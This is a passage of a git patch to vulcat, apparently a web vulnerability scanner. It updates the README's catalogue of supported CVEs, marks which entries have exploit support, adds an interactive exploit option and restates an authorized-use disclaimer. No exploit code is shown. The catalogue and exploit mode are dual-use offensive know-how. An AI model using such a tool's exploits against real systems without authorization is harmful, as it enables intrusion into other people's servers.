From b6e29d3714563a8edb511ab14c6102c335d48ca4 Mon Sep 17 00:00:00 2001
From: CLincat <3132002932@qq.com>
Date: Thu, 10 Nov 2022 11:53:21 +0800
Subject: [PATCH] 20221110-v1.1.5
---
README.md | 330 +++++++++---------
README.zh-cn.md | 328 ++++++++---------
lib/core/coreScan.py | 29 +-
lib/initial/config.py | 6 +-
lib/initial/language.py | 90 +++--
lib/initial/list.py | 165 ++++++---
lib/initial/parse.py | 5 +-
lib/plugins/exploit.py | 310 +++++++++++++++++
lib/plugins/fingerprint/webapp.py | 10 +
lib/report/output.py | 26 +-
lib/tool/logger.py | 32 +-
lib/tool/md5.py | 46 ++-
payloads/ApacheAirflow.py | 5 +-
payloads/ApacheFlink.py | 9 +-
payloads/ApacheHttpd.py | 19 +-
payloads/ApacheSolr.py | 9 +-
payloads/ApacheStruts2.py | 445 ------------------------
payloads/AtlassianConfluence.py | 52 ++-
payloads/Discuz.py | 2 +-
payloads/Drupal.py | 53 +--
payloads/ElasticSearch.py | 14 +-
payloads/F5BIGIP.py | 15 +-
payloads/Gitea.py | 8 +-
payloads/Grafana.py | 16 +-
payloads/Landray.py | 8 +-
payloads/MiniHttpd.py | 7 +-
payloads/NodeRED.py | 11 +-
payloads/Nodejs.py | 10 +-
payloads/RubyOnRails.py | 14 +-
payloads/Spring.py | 21 +-
payloads/Supervisor.py | 134 +++++++
payloads/ThinkPHP.py | 15 +-
payloads/Weblogic.py | 3 +-
payloads/Webmin.py | 4 +-
payloads/Yonyou.py | 13 +-
payloads/{ => demo}/demo.py | 0
payloads/{ => demo}/demo2.py | 0
payloads/{ => demo}/demo3.py | 0
payloads/phpMyadmin.py | 27 +-
thirdparty/HackRequests/HackRequests.py | 19 +-
vulcat.py | 4 +-
41 files changed, 1297 insertions(+), 1017 deletions(-)
create mode 100644 lib/plugins/exploit.py
delete mode 100644 payloads/ApacheStruts2.py
create mode 100644 payloads/Supervisor.py
rename payloads/{ => demo}/demo.py (100%)
rename payloads/{ => demo}/demo2.py (100%)
rename payloads/{ => demo}/demo3.py (100%)
diff --git a/README.md b/README.md
index 1c6968c..b3e5355 100644
--- a/README.md
+++ b/README.md
@@ -8,168 +8,16 @@
* If you have any ideas, suggestions, or bugs, you can issue
**Web applications that currently support scanning:**
-> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheHttpd, ApacheSkywalking, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Influxdb, RubyOnRails, Jenkins, Jetty, Jupyter, Keycloak, Landray-OA, MiniHttpd, mongo-express, Nexus, Node.js, NodeRED, phpMyAdmin, phpUnit, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
+> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheHttpd, ApacheSkywalking, ApacheSolr, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Influxdb, RubyOnRails, Jenkins, Jetty, Jupyter, Keycloak, Landray-OA, MiniHttpd, mongo-express, Nexus, Node.js, NodeRED, phpMyAdmin, phpUnit, ShowDoc, Spring, Supervisor, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
-## Vulnerabilitys List
-
-The current web vulnerabilities that support scanning: [Click on]
+**You can also check out the "Vulnerabilitys List" below to see which vulnerabilities vulcat supports scanning**
-```
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Target | Vul_id | Type | Description |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Alibaba Druid | None | unAuth | Alibaba Druid unAuthorized |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Alibaba Nacos | CVE-2021-29441 | unAuth | Alibaba Nacos unAuthorized |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Apache Airflow | CVE-2020-17526 | unAuth | Apache Airflow Authentication bypass |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Apache APISIX | CVE-2020-13945 | unAuth | Apache APISIX default access token |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Apache Flink | CVE-2020-17519 | FileRead | Apache Flink Directory traversal |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Apache Hadoop | None | unAuth | Apache Hadoop YARN ResourceManager unAuthorized |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Apache Httpd | CVE-2021-40438 | SSRF | Apache HTTP Server 2.4.48 mod_proxy SSRF |
-| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Apache HTTP Server 2.4.49 Directory traversal |
-| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Apache HTTP Server 2.4.50 Directory traversal |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Apache SkyWalking | CVE-2020-9483 | SQLinject | SkyWalking SQLinject |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Apache Solr | CVE-2017-12629 | RCE | Solr Remote code execution |
-| Apache Solr | CVE-2019-17558 | RCE | Solr Remote Code Execution Via Velocity Custom Template |
-| Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/FileRead |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Apache Struts2 | S2-001 | RCE | Apache Struts2 Remote code execution |
-| Apache Struts2 | S2-005 | RCE | Apache Struts2 Remote code execution |
-| Apache Struts2 | S2-007 | RCE | Apache Struts2 Remote code execution |
-| Apache Struts2 | S2-008 | RCE | Apache Struts2 Remote code execution |
-| Apache Struts2 | S2-009 | RCE | Apache Struts2 Remote code execution |
-| Apache Struts2 | S2-012 | RCE | Apache Struts2 Remote code execution |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Apache Tomcat | CVE-2017-12615 | FileUpload | Put method writes to any file |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| AppWeb | CVE-2018-8715 | unAuth | AppWeb Authentication bypass |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Atlassian Confluence | CVE-2015-8399 | FileRead | Confluence any file include |
-| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | Confluence Directory traversal && RCE |
-| Atlassian Confluence | CVE-2021-26084 | RCE | Confluence OGNL expression command injection |
-| Atlassian Confluence | CVE-2022-26134 | RCE | Confluence Remote code execution |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Cisco | CVE-2020-3580 | XSS | Cisco ASA/FTD XSS |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Discuz | wooyun-2010-080723 | RCE | Remote code execution |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Django | CVE-2017-12794 | XSS | Django debug page XSS |
-| Django | CVE-2018-14574 | Redirect | Django CommonMiddleware URL Redirect |
-| Django | CVE-2019-14234 | SQLinject | Django JSONfield SQLinject |
-| Django | CVE-2020-9402 | SQLinject | Django GIS SQLinject |
-| Django | CVE-2021-35042 | SQLinject | Django QuerySet.order_by SQLinject |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Drupal | CVE-2014-3704 | SQLinject | Drupal < 7.32 Drupalgeddon SQLinject |
-| Drupal | CVE-2017-6920 | RCE | Drupal Core 8 PECL YAML Remote code execution |
-| Drupal | CVE-2018-7600 | RCE | Drupal Drupalgeddon 2 Remote code execution |
-| Drupal | CVE-2018-7602 | RCE | Drupal Remote code execution |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| ElasticSearch | CVE-2014-3120 | RCE | ElasticSearch Remote code execution |
-| ElasticSearch | CVE-2015-1427 | RCE | ElasticSearch Groovy Sandbox to bypass && RCE |
-| ElasticSearch | CVE-2015-3337 | FileRead | ElasticSearch Directory traversal |
-| ElasticSearch | CVE-2015-5531 | FileRead | ElasticSearch Directory traversal |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| F5 BIG-IP | CVE-2020-5902 | RCE | BIG-IP Remote code execution |
-| F5 BIG-IP | CVE-2022-1388 | unAuth | BIG-IP Remote code execution |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Fastjson | CNVD-2017-02833 | unSerialize | Fastjson <= 1.2.24 deSerialization |
-| Fastjson | CNVD-2019-22238 | unSerialize | Fastjson <= 1.2.47 deSerialization |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Gitea | None | unAuth | Gitea 1.4.0 unAuthorized |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Gitlab | CVE-2021-22205 | RCE | GitLab Pre-Auth Remote code execution |
-| Gitlab | CVE-2021-22214 | SSRF | Gitlab CI Lint API SSRF |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Grafana | CVE-2021-43798 | FileRead | Grafana 8.x Directory traversal |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Influxdb | None | unAuth | influxdb unAuthorized |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Jenkins | CVE-2018-1000861 | RCE | jenkins Remote code execution |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Jetty | CVE-2021-28164 | DSinfo | jetty Disclosure information |
-| Jetty | CVE-2021-28169 | DSinfo | jetty Servlets ConcatServlet Disclosure information |
-| Jetty | CVE-2021-34429 | DSinfo | jetty Disclosure information |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Jupyter | None | unAuth | Jupyter unAuthorized |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Keycloak | CVE-2020-10770 | SSRF | request_uri SSRF |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Landray | CNVD-2021-28277 | FileRead/SSRF| Landray-OA FileRead/SSRF |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Mini Httpd | CVE-2018-18778 | FileRead | mini_httpd FileRead |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| mongo-express | CVE-2019-10758 | RCE | Remote code execution |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Nexus Repository | CVE-2019-5475 | RCE | 2.x yum Remote code execution |
-| Nexus Repository | CVE-2019-7238 | RCE | 3.x Remote code execution |
-| Nexus Repository | CVE-2019-15588 | RCE | 2019-5475 Bypass |
-| Nexus Repository | CVE-2020-10199 | RCE | 3.x Remote code execution |
-| Nexus Repository | CVE-2020-10204 | RCE | 3.x Remote code execution |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Nodejs | CVE-2017-14849 | FileRead | Node.js Directory traversal |
-| Nodejs | CVE-2021-21315 | RCE | Node.js Remote code execution |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| NodeRED | CVE-2021-3223 | FileRead | Node-RED Directory traversal |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| phpMyadmin | WooYun-2016-199433 | unSerialize | phpMyadmin Scripts/setup.php Deserialization |
-| phpMyadmin | CVE-2018-12613 | FileInclude | phpMyadmin 4.8.1 Remote File Inclusion |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| PHPUnit | CVE-2017-9841 | RCE | PHPUnit Remote code execution |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Ruby on Rails | CVE-2018-3760 | FileRead | Ruby on Rails Directory traversal |
-| Ruby on Rails | CVE-2019-5418 | FileRead | Ruby on Rails FileRead |
-| Ruby on Rails | CVE-2020-8163 | RCE | Ruby on Rails Remote code execution |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| ShowDoc | CNVD-2020-26585 | FileUpload | ShowDoc writes to any file |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Spring | CVE-2016-4977 | RCE | Spring Security OAuth2 Remote Command Execution |
-| Spring | CVE-2017-8046 | RCE | Spring Data Rest Remote Command Execution |
-| Spring | CVE-2018-1273 | RCE | Spring Data Commons Remote Command Execution |
-| Spring | CVE-2020-5410 | FileRead | Spring Cloud Directory traversal |
-| Spring | CVE-2021-21234 | FileRead | Spring Boot Directory traversal |
-| Spring | CVE-2022-22947 | RCE | Spring Cloud Gateway SpEl Remote code execution |
-| Spring | CVE-2022-22963 | RCE | Spring Cloud Function SpEL Remote code execution |
-| Spring | CVE-2022-22965 | RCE | Spring Framework Remote code execution |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| ThinkPHP | CVE-2018-1002015 | RCE | ThinkPHP5.x Remote code execution |
-| ThinkPHP | CNVD-2018-24942 | RCE | The forced route is not enabled Remote code execution |
-| ThinkPHP | CNNVD-201901-445 | RCE | Core class Request Remote code execution |
-| ThinkPHP | None | RCE | ThinkPHP2.x Remote code execution |
-| ThinkPHP | None | SQLinject | ThinkPHP5 ids SQLinject |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Ueditor | None | SSRF | Ueditor SSRF |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Oracle Weblogic | CVE-2014-4210 | SSRF | Weblogic SSRF |
-| Oracle Weblogic | CVE-2017-10271 | unSerialize | Weblogic XMLDecoder deSerialization |
-| Oracle Weblogic | CVE-2019-2725 | unSerialize | Weblogic wls9_async deSerialization |
-| Oracle Weblogic | CVE-2020-14750 | unAuth | Weblogic Authentication bypass |
-| Oracle Weblogic | CVE-2020-14882 | RCE | Weblogic Unauthorized command execution |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Webmin | CVE-2019-15107 | RCE | Webmin Pre-Auth Remote code execution |
-| Webmin | CVE-2019-15642 | RCE | Webmin Remote code execution |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-| Yonyou | CNNVD-201610-923 | SQLinject | Yonyou-GRP-U8 Proxy SQLinject |
-| Yonyou | CNVD-2021-30167 | RCE | Yonyou-NC BeanShell Remote code execution |
-| Yonyou | None | FileRead | Yonyou-ERP-NC NCFindWeb Directory traversal |
-| Yonyou | None | DSinfo | Yonyou-U8-OA getSessionList.jsp Disclosure information |
-| Yonyou | None | SQLinject | Yonyou-U8-OA test.jsp SQLinject |
-+----------------------+--------------------+--------------+------------------------------------------------------------+
-```
-
-
-## Code of conduct
-Before using this tool, ensure that your actions comply with local laws and regulations and that you have obtained relevant authorization.
+## Code of Conduct and Disclaimer
+* **Before using this tool, ensure that your actions comply with local laws and regulations and that you have obtained relevant authorization.**
-This tool is only for enterprises and individuals with legal authorization and is intended to enhance cyberspace security.
+* **This tool is only for enterprises and individuals with legal authorization and is intended to enhance cyberspace security.**
-If you commit any illegal acts or cause any serious consequences during the use of the tool, you shall bear the corresponding liabilities by yourself, and we will not assume any legal and joint liability.
+* **If you commit any illegal acts or cause any serious consequences during the use of the tool, you shall bear the corresponding liabilities by yourself, and we will not assume any legal and joint liability.**
## Installation & Usage
The tool is developed based on python3. Python3.8 or later is recommended
@@ -184,6 +32,10 @@ pip3 install -r requirements.txt
python3 vulcat.py -h
```
```
+Usage:
+By using this tool, you agree to the "Code of Conduct and Disclaimer" in "vulcat/README.md; If you do not agree, do not use this tool."
+
+
Usage: python3 vulcat.py
Examples:
python3 vulcat.py -u https://www.example.com/
@@ -258,6 +110,11 @@ Options:
number does not discriminate between sizes, and the
symbol - and _ are acceptable (e.g. -a fastjson -v
cnVD-2019-22238 or -a Tomcat -v CVE-2017_12615)
+ -x, --exp Use with the -a and -v parameters, After the Poc scan,
+ if the vulnerability exists, enter the Exp interaction
+ mode of the vulnerability; You can use --list to see
+ Exp support vulnerabilities. (e.g. -a httpd -v
+ CVE-2021-42013 -x)
Api:
The third party Api
@@ -297,7 +154,7 @@ Options:
drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab,
grafana, influxdb, hadoop, httpd, jenkins, jetty, jupyter, keycloak,
landray, minihttpd, mongoexpress, nexus, nacos, nodejs, nodered,
- phpmyadmin, phpunit, rails, showdoc, solr, struts2, spring,
+ phpmyadmin, phpunit, rails, showdoc, solr, spring, supervisor,
skywalking, thinkphp, tomcat, ueditor, weblogic, webmin, yonyou
```
@@ -332,7 +189,160 @@ args.ceye_token = ''
2. Then follow the tips in demo.py to fill in your own code and introduce POC into vulcat
+## Vulnerabilitys List
+
+The current web vulnerabilities that support scanning: [Click on]
+
+```
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Target | Vuln id | Vuln Type | Exp | Description |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Alibaba Druid | None | unAuth | - | Alibaba Druid unAuthorized |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Alibaba Nacos | CVE-2021-29441 | unAuth | - | Alibaba Nacos unAuthorized |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Apache Airflow | CVE-2020-17526 | unAuth | - | Apache Airflow Authentication bypass |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Apache APISIX | CVE-2020-13945 | unAuth | - | Apache APISIX default access token |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Apache Flink | CVE-2020-17519 | FileRead | Y | Apache Flink Directory traversal |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Apache Hadoop | None | unAuth | - | Apache Hadoop YARN ResourceManager unAuthorized |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Apache Httpd | CVE-2021-40438 | SSRF | - | Apache HTTP Server 2.4.48 mod_proxy SSRF |
+| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Y | Apache HTTP Server 2.4.49 Directory traversal |
+| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Y | Apache HTTP Server 2.4.50 Directory traversal |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Apache SkyWalking | CVE-2020-9483 | SQLinject | - | SkyWalking SQLinject |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Apache Solr | CVE-2017-12629 | RCE | - | Solr Remote code execution |
+| Apache Solr | CVE-2019-17558 | RCE | Y | Solr RCE Via Velocity Custom Template |
+| Apache Solr | CVE-2021-27905 | SSRF/FileRead| Y | Solr SSRF/FileRead |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Apache Tomcat | CVE-2017-12615 | FileUpload | - | Put method writes to any file |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| AppWeb | CVE-2018-8715 | unAuth | - | AppWeb Authentication bypass |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Atlassian Confluence | CVE-2015-8399 | FileRead | Y | Confluence any file include |
+| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | Y | Confluence Directory traversal && RCE |
+| Atlassian Confluence | CVE-2021-26084 | RCE | Y | Confluence OGNL expression command injection |
+| Atlassian Confluence | CVE-2022-26134 | RCE | Y | Confluence Remote code execution |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Cisco | CVE-2020-3580 | XSS | - | Cisco ASA/FTD XSS |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Discuz | wooyun-2010-080723 | RCE | Y | Remote code execution |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Django | CVE-2017-12794 | XSS | - | Django debug page XSS |
+| Django | CVE-2018-14574 | Redirect | - | Django CommonMiddleware URL Redirect |
+| Django | CVE-2019-14234 | SQLinject | - | Django JSONfield SQLinject |
+| Django | CVE-2020-9402 | SQLinject | - | Django GIS SQLinject |
+| Django | CVE-2021-35042 | SQLinject | - | Django QuerySet.order_by SQLinject |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Drupal | CVE-2014-3704 | SQLinject | - | Drupal < 7.32 Drupalgeddon SQLinject |
+| Drupal | CVE-2017-6920 | RCE | - | Drupal Core 8 PECL YAML Remote code execution |
+| Drupal | CVE-2018-7600 | RCE | Y | Drupal Drupalgeddon 2 Remote code execution |
+| Drupal | CVE-2018-7602 | RCE | - | Drupal Remote code execution |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| ElasticSearch | CVE-2014-3120 | RCE | Y | ElasticSearch Remote code execution |
+| ElasticSearch | CVE-2015-1427 | RCE | Y | ElasticSearch Groovy Sandbox to bypass && RCE |
+| ElasticSearch | CVE-2015-3337 | FileRead | Y | ElasticSearch Directory traversal |
+| ElasticSearch | CVE-2015-5531 | FileRead | Y | ElasticSearch Directory traversal |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| F5 BIG-IP | CVE-2020-5902 | RCE | - | BIG-IP Remote code execution |
+| F5 BIG-IP | CVE-2022-1388 | unAuth | Y | BIG-IP Remote code execution |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Fastjson | CNVD-2017-02833 | unSerialize | - | Fastjson <= 1.2.24 deSerialization |
+| Fastjson | CNVD-2019-22238 | unSerialize | - | Fastjson <= 1.2.47 deSerialization |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Gitea | None | unAuth | - | Gitea 1.4.0 unAuthorized |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Gitlab | CVE-2021-22205 | RCE | - | GitLab Pre-Auth Remote code execution |
+| Gitlab | CVE-2021-22214 | SSRF | - | Gitlab CI Lint API SSRF |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Grafana | CVE-2021-43798 | FileRead | Y | Grafana 8.x Directory traversal |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Influxdb | None | unAuth | - | influxdb unAuthorized |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Jenkins | CVE-2018-1000861 | RCE | - | jenkins Remote code execution |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Jetty | CVE-2021-28164 | DSinfo | - | jetty Disclosure information |
+| Jetty | CVE-2021-28169 | DSinfo | - | jetty Servlets ConcatServlet Disclosure information |
+| Jetty | CVE-2021-34429 | DSinfo | - | jetty Disclosure information |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Jupyter | None | unAuth | - | Jupyter unAuthorized |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Keycloak | CVE-2020-10770 | SSRF | - | request_uri SSRF |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Landray | CNVD-2021-28277 | FileRead/SSRF| Y | Landray-OA FileRead/SSRF |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Mini Httpd | CVE-2018-18778 | FileRead | - | mini_httpd FileRead |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| mongo-express | CVE-2019-10758 | RCE | - | Remote code execution |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Nexus Repository | CVE-2019-5475 | RCE | Y | 2.x yum Remote code execution |
+| Nexus Repository | CVE-2019-7238 | RCE | - | 3.x Remote code execution |
+| Nexus Repository | CVE-2019-15588 | RCE | Y | 2019-5475 Bypass |
+| Nexus Repository | CVE-2020-10199 | RCE | - | 3.x Remote code execution |
+| Nexus Repository | CVE-2020-10204 | RCE | - | 3.x Remote code execution |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Nodejs | CVE-2017-14849 | FileRead | Y | Node.js Directory traversal |
+| Nodejs | CVE-2021-21315 | RCE | - | Node.js Remote code execution |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| NodeRED | CVE-2021-3223 | FileRead | Y | Node-RED Directory traversal |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| phpMyadmin | WooYun-2016-199433 | unSerialize | - | phpMyadmin Scripts/setup.php Deserialization |
+| phpMyadmin | CVE-2018-12613 | FileInclude | Y | phpMyadmin 4.8.1 Remote File Inclusion |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| PHPUnit | CVE-2017-9841 | RCE | Y | PHPUnit Remote code execution |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Ruby on Rails | CVE-2018-3760 | FileRead | Y | Ruby on Rails Directory traversal |
+| Ruby on Rails | CVE-2019-5418 | FileRead | Y | Ruby on Rails FileRead |
+| Ruby on Rails | CVE-2020-8163 | RCE | - | Ruby on Rails Remote code execution |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| ShowDoc | CNVD-2020-26585 | FileUpload | - | ShowDoc writes to any file |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Spring | CVE-2016-4977 | RCE | - | Spring Security OAuth2 Remote Command Execution |
+| Spring | CVE-2017-8046 | RCE | - | Spring Data Rest Remote Command Execution |
+| Spring | CVE-2018-1273 | RCE | - | Spring Data Commons Remote Command Execution |
+| Spring | CVE-2020-5410 | FileRead | Y | Spring Cloud Directory traversal |
+| Spring | CVE-2021-21234 | FileRead | Y | Spring Boot Directory traversal |
+| Spring | CVE-2022-22947 | RCE | - | Spring Cloud Gateway SpEl Remote code execution |
+| Spring | CVE-2022-22963 | RCE | - | Spring Cloud Function SpEL Remote code execution |
+| Spring | CVE-2022-22965 | RCE | - | Spring Framework Remote code execution |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Supervisor | CVE-2017-11610 | RCE | - | Supervisor Remote Command Execution |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| ThinkPHP | CVE-2018-1002015 | RCE | Y | ThinkPHP5.x Remote code execution |
+| ThinkPHP | CNVD-2018-24942 | RCE | Y | The forced route is not enabled RCE |
+| ThinkPHP | CNNVD-201901-445 | RCE | Y | Core class Request Remote code execution |
+| ThinkPHP | None | RCE | - | ThinkPHP2.x Remote code execution |
+| ThinkPHP | None | SQLinject | - | ThinkPHP5 ids SQLinject |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Ueditor | None | SSRF | - | Ueditor SSRF |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Oracle Weblogic | CVE-2014-4210 | SSRF | - | Weblogic SSRF |
+| Oracle Weblogic | CVE-2017-10271 | unSerialize | - | Weblogic XMLDecoder deSerialization |
+| Oracle Weblogic | CVE-2019-2725 | unSerialize | - | Weblogic wls9_async deSerialization |
+| Oracle Weblogic | CVE-2020-14750 | unAuth | - | Weblogic Authentication bypass |
+| Oracle Weblogic | CVE-2020-14882 | RCE | - | Weblogic Unauthorized command execution |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Webmin | CVE-2019-15107 | RCE | Y | Webmin Pre-Auth Remote code execution |
+| Webmin | CVE-2019-15642 | RCE | Y | Webmin Remote code execution |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+| Yonyou | CNNVD-201610-923 | SQLinject | - | Yonyou-GRP-U8 Proxy SQLinject |
+| Yonyou | CNVD-2021-30167 | RCE | Y | Yonyou-NC BeanShell Remote code execution |
+| Yonyou | None | FileRead | - | Yonyou-ERP-NC NCFindWeb Directory traversal |
+| Yonyou | None | DSinfo | - | Yonyou-U8-OA getSessionList.jsp Disclosure info |
+| Yonyou | None | SQLinject | - | Yonyou-U8-OA test.jsp SQLinject |
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
+vulcat-1.1.5/2022.11
+94/Poc
+34/Exp
+```
+
+
## Thanks
* [vulmap](https://github.com/zhzyker/vulmap)
* [sqlmap](https://github.com/sqlmapproject/sqlmap)
-* [dirsearch](https://github.com/maurosoria/dirsearch)
\ No newline at end of file
+* [dirsearch](https://github.com/maurosoria/dirsearch)
+* [HackRequests](https://github.com/boy-hack/hack-requests)
diff --git a/README.zh-cn.md b/README.zh-cn.md
index 5abda24..e6a401b 100644
--- a/README.zh-cn.md
+++ b/README.zh-cn.md
@@ -7,168 +7,16 @@
* 如果有什么想法、建议或者遇到了BUG, 都可以issues
**目前支持扫描的web应用程序有:**
-> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheHttpd, ApacheSkywalking, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Influxdb, RubyOnRails, Jenkins, Jetty, Jupyter, Keycloak, Landray-OA, MiniHttpd, mongo-express, Nexus, Node.js, NodeRED, phpMyAdmin, phpUnit, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
+> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheHttpd, ApacheSkywalking, ApacheSolr, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Influxdb, RubyOnRails, Jenkins, Jetty, Jupyter, Keycloak, Landray-OA, MiniHttpd, mongo-express, Nexus, Node.js, NodeRED, phpMyAdmin, phpUnit, ShowDoc, Spring, Supervisor, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
-## 漏洞列表
-
-目前支持扫描的web漏洞有: [点击展开]
+**你还可以查看下方的"漏洞列表", 查看vulcat支持扫描的漏洞**
-```
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Target | Vul_id | Type | Description |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Alibaba Druid | None | unAuth | 阿里巴巴Druid未授权访问 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Alibaba Nacos | CVE-2021-29441 | unAuth | 阿里巴巴Nacos未授权访问 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Apache Airflow | CVE-2020-17526 | unAuth | Airflow身份验证绕过 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
